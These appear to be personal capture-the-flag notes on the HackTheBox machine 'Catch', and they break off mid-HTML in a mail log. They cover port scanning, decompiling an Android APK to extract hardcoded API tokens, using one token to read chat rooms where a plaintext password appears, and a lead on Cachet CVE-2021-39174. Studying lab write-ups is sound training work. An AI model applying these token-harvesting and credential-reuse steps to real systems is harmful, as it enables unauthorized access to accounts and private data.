1. IP Address
# Machine Address
10.10.11.146
# Local Address
10.10.14.68
2. Nmap
nmap -sV -sC -oA nmap/catach 10.10.11.150
# Nmap 7.92 scan initiated Wed Mar 23 00:34:46 2022 as: nmap -sV -sC -oA nmap/catach 10.10.11.150
Nmap scan report for 10.10.11.150
Host is up (0.24s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Catch Global Systems
|_http-server-header: Apache/2.4.41 (Ubuntu)
3000/tcp open ppp?
| fingerprint-strings:
| GenericLines, Help, RTSPRequest:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Content-Type: text/html; charset=UTF-8
| Set-Cookie: i_like_gitea=877f214d45e8e984; Path=/; HttpOnly
| Set-Cookie: _csrf=ivNkrBqg5jEah1UkloDuI_ZNHB06MTY0ODAxMDEwNjI0MjUyNDIxNQ; Path=/; Expires=Thu, 24 Mar 2022 04:35:06 GMT; HttpOnly; SameSite=Lax
| Set-Cookie: macaron_flash=; Path=/; Max-Age=0; HttpOnly
| X-Frame-Options: SAMEORIGIN
| Date: Wed, 23 Mar 2022 04:35:06 GMT
| <!DOCTYPE html>
| <html lang="en-US" class="theme-">
| <head data-suburl="">
| <meta charset="utf-8">
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title> Catch Repositories </title>
| <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiQ2F0Y2ggUmVwb3NpdG9yaWVzIiwic2hvcnRfbmFtZSI6IkNhdGNoIFJlcG9zaXRvcmllcyIsInN0YXJ0X3VybCI6Imh0dHA6Ly9naXRlYS5jYXRjaC5odGI6MzAwMC8iLCJpY29ucyI6W3sic3JjIjoiaHR0cDovL2dpdGVhLmNhdGNoLmh0Yjoz
| HTTPOptions:
| HTTP/1.0 405 Method Not Allowed
| Set-Cookie: i_like_gitea=3e903b88878d073e; Path=/; HttpOnly
| Set-Cookie: _csrf=9ufU_zzXpFboQzMyNjwlt_a-Nw86MTY0ODAxMDExMzM3MDg0ODA1OA; Path=/; Expires=Thu, 24 Mar 2022 04:35:13 GMT; HttpOnly; SameSite=Lax
| Set-Cookie: macaron_flash=; Path=/; Max-Age=0; HttpOnly
| X-Frame-Options: SAMEORIGIN
| Date: Wed, 23 Mar 2022 04:35:13 GMT
|_ Content-Length: 0
8000/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Catch Global Systems
|_http-server-header: Apache/2.4.29 (Ubuntu)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.92%I=7%D=3/23%Time=623AA379%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(GetRequest,30E1,"HTTP/1\.0\x20200\x20OK\r\nContent-Type:\
SF:x20text/html;\x20charset=UTF-8\r\nSet-Cookie:\x20i_like_gitea=877f214d4
SF:5e8e984;\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf=ivNkrBqg5jEah1U
SF:kloDuI_ZNHB06MTY0ODAxMDEwNjI0MjUyNDIxNQ;\x20Path=/;\x20Expires=Thu,\x20
SF:24\x20Mar\x202022\x2004:35:06\x20GMT;\x20HttpOnly;\x20SameSite=Lax\r\nS
SF:et-Cookie:\x20macaron_flash=;\x20Path=/;\x20Max-Age=0;\x20HttpOnly\r\nX
SF:-Frame-Options:\x20SAMEORIGIN\r\nDate:\x20Wed,\x2023\x20Mar\x202022\x20
SF:04:35:06\x20GMT\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en-US\"\x20c
SF:lass=\"theme-\">\n<head\x20data-suburl=\"\">\n\t<meta\x20charset=\"utf-
SF:8\">\n\t<meta\x20name=\"viewport\"\x20content=\"width=device-width,\x20
SF:initial-scale=1\">\n\t<meta\x20http-equiv=\"x-ua-compatible\"\x20conten
SF:t=\"ie=edge\">\n\t<title>\x20Catch\x20Repositories\x20</title>\n\t<link
SF:\x20rel=\"manifest\"\x20href=\"data:application/json;base64,eyJuYW1lIjo
SF:iQ2F0Y2ggUmVwb3NpdG9yaWVzIiwic2hvcnRfbmFtZSI6IkNhdGNoIFJlcG9zaXRvcmllcy
SF:IsInN0YXJ0X3VybCI6Imh0dHA6Ly9naXRlYS5jYXRjaC5odGI6MzAwMC8iLCJpY29ucyI6W
SF:3sic3JjIjoiaHR0cDovL2dpdGVhLmNhdGNoLmh0Yjoz")%r(Help,67,"HTTP/1\.1\x204
SF:00\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r
SF:\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(HTTPOptions,17F
SF:,"HTTP/1\.0\x20405\x20Method\x20Not\x20Allowed\r\nSet-Cookie:\x20i_like
SF:_gitea=3e903b88878d073e;\x20Path=/;\x20HttpOnly\r\nSet-Cookie:\x20_csrf
SF:=9ufU_zzXpFboQzMyNjwlt_a-Nw86MTY0ODAxMDExMzM3MDg0ODA1OA;\x20Path=/;\x20
SF:Expires=Thu,\x2024\x20Mar\x202022\x2004:35:13\x20GMT;\x20HttpOnly;\x20S
SF:ameSite=Lax\r\nSet-Cookie:\x20macaron_flash=;\x20Path=/;\x20Max-Age=0;\
SF:x20HttpOnly\r\nX-Frame-Options:\x20SAMEORIGIN\r\nDate:\x20Wed,\x2023\x2
SF:0Mar\x202022\x2004:35:13\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(RTS
SF:PRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20tex
SF:t/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20
SF:Request");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Mar 23 00:36:45 2022 -- 1 IP address (1 host up) scanned in 118.70 seconds
nmap -p- --min-rate 10000 -oA nmap/all-tcp 10.10.11.150
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-23 00:38 EDT
Nmap scan report for 10.10.11.150
Host is up (0.73s latency).
Not shown: 65221 filtered tcp ports (no-response), 312 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 96.28 seconds
nmap -p 22,80 -sCV -oA nmap/nmap-tcpscripts 10.10.11.150
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-23 00:41 EDT
Nmap scan report for 10.10.11.150
Host is up (0.25s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Catch Global Systems
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.42 seconds
ikto -h 10.10.11.150
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.11.150
+ Target Hostname: 10.10.11.150
+ Target Port: 80
+ Start Time: 2022-03-23 00:43:34 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
^C%
3. Feroxbuster
feroxbuster -u http://catch.htb -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.3.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://catch.htb
🚀 Threads │ 50
📖 Wordlist │ /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.3.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
301 9l 28w 311c http://catch.htb/javascript
403 9l 28w 274c http://catch.htb/server-status
[####################] - 2m 59998/59998 0s found:2 errors:0
[####################] - 2m 29999/29999 198/s http://catch.htb
[####################] - 2m 29999/29999 199/s http://catch.htb/javascript
`http://catch.htb/server-status
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.3.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://catch.htb/server-status
🚀 Threads │ 50
📖 Wordlist │ /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.3.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
WLD 9l 28w 274c Got 403 for http://catch.htb/server-status/c6126e3c368e4ff0b48f87ed5ecf5b45 (url length: 32)
WLD - - - Wildcard response is static; auto-filtering 274 responses; toggle this behavior by using --dont-filter
WLD 9l 28w 274c Got 403 for http://catch.htb/server-status/e9069e734a614a2ca82c9fb0be01d0825bf963cdab62453fa32c1db094da487a7195358385974a89881ebf44bb885887 (url length: 96)
[####################] - 2m 29999/29999 0s found:2 errors:0
[####################] - 2m 30001/29999 199/s http://catch.htb/server-status
4. Anbox
adb install catchv1.0.apk
`status.catch.htb
sudo systemctl restart snap.anbox.container-manager.service
https://github.com/Debyzulkarnain/anbox-bridge/
chmod +x anbox-bridge.sh
./anbox-bridge.sh
TIME OUT
anbox launch --package=org.anbox.appmgr --component=org.anbox.appmgr.AppViewActivity
--container-network-address=192.168.250.1/24 --container-network-gateway=192.168.250.255
5. Apktool
Суулгах
wget https://raw.githubusercontent.com/iBotPeaches/Apktool/master/scripts/linux/apktool
## Download jar
https://bitbucket.org/iBotPeaches/apktool/downloads/
mv apktool_2* apktool.jar
sudo mv apktool apktool.jar /usr/local/bin
chmod +x apktool*
apktool d catchv1.0.apk
I: Using Apktool 2.6.1 on catchv1.0.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /home/va4mi/.local/share/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...
-rw-r--r-- 1 va4mi va4mi 980 Mar 27 03:14 AndroidManifest.xml
-rw-r--r-- 1 va4mi va4mi 2.2K Mar 27 03:14 apktool.yml
drwxr-xr-x 1 va4mi va4mi 54 Mar 27 03:14 original
drwxr-xr-x 1 va4mi va4mi 3.3K Mar 27 03:14 res
drwxr-xr-x 1 va4mi va4mi 36 Mar 27 03:14 smali
/home/va4mi/Documents/htb/machine/Catch/apk/catchv1.0/res/values/strings.xml
<?xml version="1.0" encoding="utf-8"?>
<resources>
<string name="abc_action_bar_home_description">Navigate home</string>
<string name="abc_action_bar_up_description">Navigate up</string>
<string name="abc_action_menu_overflow_description">More options</string>
<string name="abc_action_mode_done">Done</string>
<string name="abc_activity_chooser_view_see_all">See all</string>
<string name="abc_activitychooserview_choose_application">Choose an app</string>
<string name="abc_capital_off">OFF</string>
<string name="abc_capital_on">ON</string>
<string name="abc_menu_alt_shortcut_label">Alt+</string>
<string name="abc_menu_ctrl_shortcut_label">Ctrl+</string>
<string name="abc_menu_delete_shortcut_label">delete</string>
<string name="abc_menu_enter_shortcut_label">enter</string>
<string name="abc_menu_function_shortcut_label">Function+</string>
<string name="abc_menu_meta_shortcut_label">Meta+</string>
<string name="abc_menu_shift_shortcut_label">Shift+</string>
<string name="abc_menu_space_shortcut_label">space</string>
<string name="abc_menu_sym_shortcut_label">Sym+</string>
<string name="abc_prepend_shortcut_label">Menu+</string>
<string name="abc_search_hint">Search…</string>
<string name="abc_searchview_description_clear">Clear query</string>
<string name="abc_searchview_description_query">Search query</string>
<string name="abc_searchview_description_search">Search</string>
<string name="abc_searchview_description_submit">Submit query</string>
<string name="abc_searchview_description_voice">Voice search</string>
<string name="abc_shareactionprovider_share_with">Share with</string>
<string name="abc_shareactionprovider_share_with_application">Share with %s</string>
<string name="abc_toolbar_collapse_description">Collapse</string>
<string name="app_name">Catch</string>
<string name="appbar_scrolling_view_behavior">com.google.android.material.appbar.AppBarLayout$ScrollingViewBehavior</string>
<string name="bottom_sheet_behavior">com.google.android.material.bottomsheet.BottomSheetBehavior</string>
<string name="bottomsheet_action_expand_halfway">Expand halfway</string>
<string name="character_counter_content_description">Characters entered %1$d of %2$d</string>
<string name="character_counter_overflowed_content_description">Character limit exceeded %1$d of %2$d</string>
<string name="character_counter_pattern">%1$d/%2$d</string>
<string name="chip_text">Chip text</string>
<string name="clear_text_end_icon_content_description">Clear text</string>
<string name="error_icon_content_description">Error</string>
<string name="exposed_dropdown_menu_content_description">Show dropdown menu</string>
<string name="fab_transformation_scrim_behavior">com.google.android.material.transformation.FabTransformationScrimBehavior</string>
<string name="fab_transformation_sheet_behavior">com.google.android.material.transformation.FabTransformationSheetBehavior</string>
<string name="gitea_token">b87bfb6345ae72ed5ecdcee05bcb34c83806fbd0</string>
<string name="hide_bottom_view_on_scroll_behavior">com.google.android.material.behavior.HideBottomViewOnScrollBehavior</string>
<string name="icon_content_description">Dialog Icon</string>
<string name="item_view_role_description">Tab</string>
<string name="lets_chat_token">NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2YjU5NDljNQ==</string>
<string name="material_clock_display_divider">:</string>
<string name="material_clock_toggle_content_description">Select AM or PM</string>
<string name="material_hour_selection">Select hour</string>
<string name="material_hour_suffix">"%1$s o'clock"</string>
<string name="material_minute_selection">Select minutes</string>
<string name="material_minute_suffix">%1$s minutes</string>
<string name="material_slider_range_end">Range end,</string>
<string name="material_slider_range_start">Range start,</string>
<string name="material_timepicker_am">AM</string>
<string name="material_timepicker_clock_mode_description">Switch to clock mode for the time input.</string>
<string name="material_timepicker_hour">Hour</string>
<string name="material_timepicker_minute">Minute</string>
<string name="material_timepicker_pm">PM</string>
<string name="material_timepicker_select_time">Select time</string>
<string name="material_timepicker_text_input_mode_description">Switch to text input mode for the time input.</string>
<string name="mtrl_badge_numberless_content_description">New notification</string>
<string name="mtrl_chip_close_icon_content_description">Remove %1$s</string>
<string name="mtrl_exceed_max_badge_number_content_description">More than %1$d new notifications</string>
<string name="mtrl_exceed_max_badge_number_suffix">%1$d%2$s</string>
<string name="mtrl_picker_a11y_next_month">Change to next month</string>
<string name="mtrl_picker_a11y_prev_month">Change to previous month</string>
<string name="mtrl_picker_announce_current_selection">Current selection: %1$s</string>
<string name="mtrl_picker_cancel">@android:string/cancel</string>
<string name="mtrl_picker_confirm">@android:string/ok</string>
<string name="mtrl_picker_date_header_selected">%1$s</string>
<string name="mtrl_picker_date_header_title">Select Date</string>
<string name="mtrl_picker_date_header_unselected">Selected date</string>
<string name="mtrl_picker_day_of_week_column_header">Column of days: %1$s</string>
<string name="mtrl_picker_invalid_format">Invalid format.</string>
<string name="mtrl_picker_invalid_format_example">Example: %1$s</string>
<string name="mtrl_picker_invalid_format_use">Use: %1$s</string>
<string name="mtrl_picker_invalid_range">Invalid range.</string>
<string name="mtrl_picker_navigate_to_year_description">Navigate to year %1$s</string>
<string name="mtrl_picker_out_of_range">Out of range: %1$s</string>
<string name="mtrl_picker_range_header_only_end_selected">Start date – %1$s</string>
<string name="mtrl_picker_range_header_only_start_selected">%1$s – End date</string>
<string name="mtrl_picker_range_header_selected">%1$s – %2$s</string>
<string name="mtrl_picker_range_header_title">Select Range</string>
<string name="mtrl_picker_range_header_unselected">Start date – End date</string>
<string name="mtrl_picker_save">Save</string>
<string name="mtrl_picker_text_input_date_hint">Date</string>
<string name="mtrl_picker_text_input_date_range_end_hint">End date</string>
<string name="mtrl_picker_text_input_date_range_start_hint">Start date</string>
<string name="mtrl_picker_text_input_day_abbr">d</string>
<string name="mtrl_picker_text_input_month_abbr">m</string>
<string name="mtrl_picker_text_input_year_abbr">y</string>
<string name="mtrl_picker_toggle_to_calendar_input_mode">Switch to calendar input mode</string>
<string name="mtrl_picker_toggle_to_day_selection">Tap to switch to selecting a day</string>
<string name="mtrl_picker_toggle_to_text_input_mode">Switch to text input mode</string>
<string name="mtrl_picker_toggle_to_year_selection">Tap to switch to selecting a year</string>
<string name="password_toggle_content_description">Show password</string>
<string name="path_password_eye">M12,4.5C7,4.5 2.73,7.61 1,12c1.73,4.39 6,7.5 11,7.5s9.27,-3.11 11,-7.5c-1.73,-4.39 -6,-7.5 -11,-7.5zM12,17c-2.76,0 -5,-2.24 -5,-5s2.24,-5 5,-5 5,2.24 5,5 -2.24,5 -5,5zM12,9c-1.66,0 -3,1.34 -3,3s1.34,3 3,3 3,-1.34 3,-3 -1.34,-3 -3,-3z</string>
<string name="path_password_eye_mask_strike_through">M2,4.27 L19.73,22 L22.27,19.46 L4.54,1.73 L4.54,1 L23,1 L23,23 L1,23 L1,4.27 Z</string>
<string name="path_password_eye_mask_visible">M2,4.27 L2,4.27 L4.54,1.73 L4.54,1.73 L4.54,1 L23,1 L23,23 L1,23 L1,4.27 Z</string>
<string name="path_password_strike_through">M3.27,4.27 L19.74,20.74</string>
<string name="search_menu_title">Search</string>
<string name="slack_token">xoxp-23984754863-2348975623103</string>
<string name="status_bar_notification_info_overflow">999+</string>
</resources>
<string name="gitea_token">b87bfb6345ae72ed5ecdcee05bcb34c83806fbd0</string>
<string name="lets_chat_token">NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2YjU5NDljNQ==</string>
<string name="slack_token">xoxp-23984754863-2348975623103</string>
6. Lets-chat
gitea_token: 3000
lets_chat: 5000
http://catch.htb:5000/login
Request:
GET /login HTTP/1.1
Host: catch.htb:5000
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: i_like_gitea=79ce62633af6c717; _csrf=b87bfb6345ae72ed5ecdcee05bcb34c83806fbd0; redirect_to=%2F; connect.sid=s%3A0u7u5fEybnLbA896XWTce2Lm-EO18xLx.GY6CynY9cKqQ%2F4TgrqbjKH4C%2F8RHMYI1rRUfNnNv2DY
Upgrade-Insecure-Requests: 1
If-None-Match: W/"a3d-MtLmehC+UNT/n7d5xdwnaq9VCK8"
Cache-Control: max-age=0
API requests must be authenticated using Basic Authentication or with a Bearer token. In both cases an API token is required.
curl http://catch.htb:5000/rooms -H "Accept: application/json" -H "Authorization: Bearer NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2YjU5NDljNQ==" | jq .
rooms.json
[
{
"id": "61b86b28d984e2451036eb17",
"slug": "status",
"name": "Status",
"description": "Cachet Updates and Maintenance",
"lastActive": "2021-12-14T10:34:20.749Z",
"created": "2021-12-14T10:00:08.384Z",
"owner": "61b86aead984e2451036eb16",
"private": false,
"hasPassword": false,
"participants": []
},
{
"id": "61b8708efe190b466d476bfb",
"slug": "android_dev",
"name": "Android Development",
"description": "Android App Updates, Issues & More",
"lastActive": "2021-12-14T10:24:21.145Z",
"created": "2021-12-14T10:23:10.474Z",
"owner": "61b86aead984e2451036eb16",
"private": false,
"hasPassword": false,
"participants": []
},
{
"id": "61b86b3fd984e2451036eb18",
"slug": "employees",
"name": "Employees",
"description": "New Joinees, Org updates",
"lastActive": "2021-12-14T10:18:04.710Z",
"created": "2021-12-14T10:00:31.043Z",
"owner": "61b86aead984e2451036eb16",
"private": false,
"hasPassword": false,
"participants": []
}
]
curl http://catch.htb:5000/users -H "Accept: application/json" -H "Authorization: Bearer NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2YjU5NDljNQ==" | jq . >> users.json
[
{
"id": "61b86aead984e2451036eb16",
"firstName": "Administrator",
"lastName": "NA",
"username": "admin",
"displayName": "Admin",
"avatar": "e2b5310ec47bba317c5f1b5889e96f04",
"openRooms": [
"61b86b28d984e2451036eb17",
"61b86b3fd984e2451036eb18",
"61b8708efe190b466d476bfb"
]
},
{
"id": "61b86dbdfe190b466d476bf0",
"firstName": "John",
"lastName": "Smith",
"username": "john",
"displayName": "John",
"avatar": "f5504305b704452bba9c94e228f271c4",
"openRooms": [
"61b86b3fd984e2451036eb18",
"61b86b28d984e2451036eb17"
]
},
{
"id": "61b86e40fe190b466d476bf2",
"firstName": "Will",
"lastName": "Robinson",
"username": "will",
"displayName": "Will",
"avatar": "7c6143461e935a67981cc292e53c58fc",
"openRooms": [
"61b86b3fd984e2451036eb18",
"61b86b28d984e2451036eb17"
]
},
{
"id": "61b86f15fe190b466d476bf5",
"firstName": "Lucas",
"lastName": "NA",
"username": "lucas",
"displayName": "Lucas",
"avatar": "b36396794553376673623dc0f6dec9bb",
"openRooms": [
"61b86b28d984e2451036eb17",
"61b86b3fd984e2451036eb18"
]
}
]
61b86b3fd984e2451036eb18
:
curl http://catch.htb:5000/rooms/61b86b3fd984e2451036eb18/messages -H "Accept: application/json" -H "Authorization: Bearer NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2YjU5NDljNQ==" | jq .
[
{
"id": "61b86f5cfe190b466d476bf7",
"text": "Thanks @admin ",
"posted": "2021-12-14T10:18:04.710Z",
"owner": "61b86f15fe190b466d476bf5",
"room": "61b86b3fd984e2451036eb18"
},
{
"id": "61b86ef2fe190b466d476bf4",
"text": "Please welcome our new IT Admin - Lucas, a crucial role that will help Catch’s revenue and will contribute to the overall profitability of the company!",
"posted": "2021-12-14T10:16:18.187Z",
"owner": "61b86aead984e2451036eb16",
"room": "61b86b3fd984e2451036eb18"
},
{
"id": "61b86e5dfe190b466d476bf3",
"text": "Thanks John! Glad to be part of the Catch ",
"posted": "2021-12-14T10:13:49.568Z",
"owner": "61b86e40fe190b466d476bf2",
"room": "61b86b3fd984e2451036eb18"
},
{
"id": "61b86e12fe190b466d476bf1",
"text": "Welcome Will!",
"posted": "2021-12-14T10:12:34.388Z",
"owner": "61b86dbdfe190b466d476bf0",
"room": "61b86b3fd984e2451036eb18"
},
{
"id": "61b86d5ffe190b466d476bef",
"text": "Join me in welcoming our new employee Will Robinson who's working as iOS Developer with John Team",
"posted": "2021-12-14T10:09:35.597Z",
"owner": "61b86aead984e2451036eb16",
"room": "61b86b3fd984e2451036eb18"
}
]
61b86b28d984e2451036eb17
:
curl http://catch.htb:5000/rooms/61b86b28d984e2451036eb17/messages -H "Accept: application/json" -H "Authorization: Bearer NjFiODZhZWFkOTg0ZTI0NTEwMzZlYjE2OmQ1ODg0NjhmZjhiYWU0NDYzNzlhNTdmYTJiNGU2M2EyMzY4MjI0MzM2YjU5NDljNQ==" | jq .
[
{
"id": "61b8732cfe190b466d476c02",
"text": "ah sure!",
"posted": "2021-12-14T10:34:20.749Z",
"owner": "61b86dbdfe190b466d476bf0",
"room": "61b86b28d984e2451036eb17"
},
{
"id": "61b8731ffe190b466d476c01",
"text": "You should actually include this task to your list as well as a part of quarterly audit",
"posted": "2021-12-14T10:34:07.449Z",
"owner": "61b86aead984e2451036eb16",
"room": "61b86b28d984e2451036eb17"
},
{
"id": "61b872b9fe190b466d476c00",
"text": "Also make sure we've our systems, applications and databases up-to-date.",
"posted": "2021-12-14T10:32:25.514Z",
"owner": "61b86dbdfe190b466d476bf0",
"room": "61b86b28d984e2451036eb17"
},
{
"id": "61b87282fe190b466d476bff",
"text": "Excellent! ",
"posted": "2021-12-14T10:31:30.403Z",
"owner": "61b86aead984e2451036eb16",
"room": "61b86b28d984e2451036eb17"
},
{
"id": "61b87277fe190b466d476bfe",
"text": "Why not. We've this in our todo list for next quarter",
"posted": "2021-12-14T10:31:19.094Z",
"owner": "61b86dbdfe190b466d476bf0",
"room": "61b86b28d984e2451036eb17"
},
{
"id": "61b87241fe190b466d476bfd",
"text": "@john is it possible to add SSL to our status domain to make sure everything is secure ? ",
"posted": "2021-12-14T10:30:25.108Z",
"owner": "61b86aead984e2451036eb16",
"room": "61b86b28d984e2451036eb17"
},
{
"id": "61b8702dfe190b466d476bfa",
"text": "Here are the credentials `john : E}V!mywu_69T4C}W`",
"posted": "2021-12-14T10:21:33.859Z",
"owner": "61b86f15fe190b466d476bf5",
"room": "61b86b28d984e2451036eb17"
},
{
"id": "61b87010fe190b466d476bf9",
"text": "Sure one sec.",
"posted": "2021-12-14T10:21:04.635Z",
"owner": "61b86f15fe190b466d476bf5",
"room": "61b86b28d984e2451036eb17"
},
{
"id": "61b86fb1fe190b466d476bf8",
"text": "Can you create an account for me ? ",
"posted": "2021-12-14T10:19:29.677Z",
"owner": "61b86dbdfe190b466d476bf0",
"room": "61b86b28d984e2451036eb17"
},
{
"id": "61b86f4dfe190b466d476bf6",
"text": "Hey Team! I'll be handling the `status.catch.htb` from now on. Lemme know if you need anything from me. ",
"posted": "2021-12-14T10:17:49.761Z",
"owner": "61b86f15fe190b466d476bf5",
"room": "61b86b28d984e2451036eb17"
}
]
`john : E}V!mywu_69T4C}W
7. Cachet
http://status.catch.htb:8000/dashboard
7.1 CVE-2021-39174
https://blog.sonarsource.com/cachet-code-execution-via-laravel-configuration-injectionhttp://status.catch.htb:8000/dashboard/settings/mail
Test Log:
[2022-03-27 09:45:50] production.DEBUG: Message-ID: <2f0396c23b645e8f2c65c399b93a2645@status.catch.htb>
Date: Sun, 27 Mar 2022 09:45:50 +0000
Subject: Ping from Cachet!
From: Cachet <notify@10.129.136.74>
To: john@catch.htb
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="_=_swift_1648374350_a552bce8393e8e09949592d9f281dd7d_=_"
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
</head>
<body style="font-family: Avenir, Helvetica, sans-serif; box-sizing: border-box; background-color: #f5f8fa; color: #74787E; height: 100%; hyphens: auto; line-height: 1.4; margin: 0; -moz-hyphens: auto; -ms-word-break: break-all; width: 100% !important; -webkit-hyphens: auto; -webkit-text-size-adjust: none; word-break: break-word;">
<style>
@media only screen and (max-width: 600px) {
.inner-body {
width: 100% !important;
}
.footer {
width: 100% !important;
}
}
@media only screen and (max-width: 500px) {
.button {
width: 100% !important;
}
}
</style>
<table class="wrapper" width="100%" cellpadding="0" cellspacing="0" style="font-family: Avenir, Helvetica, sans-serif; box-sizing: border-box; background-color: #f5f8fa; margin: 0; padding: 0; width: 100%; -premailer-cellpadding: 0; -premailer-cellspacing: 0; -premailer-width: 100%;"><tr>
<td align="center" style="font-family: Avenir, Helvetica, sans-serif; box-sizing: border-box;">
<table class="content" width="100%" cellpadding="0" cellspacing="0" style="font-family: Avenir, Helvetica, sans-serif; box-sizing: border-box; margin: 0; padding: 0; width: 100%; -premailer-cellpadding: 0; -premailer-cellspacing: 0; -premailer-width: 100%;">
<tr>
<td class="header" style="font-family: Avenir, Helvetica, sans-serif; box-sizing: border-box; padding: 25px 0; text-align: center;">
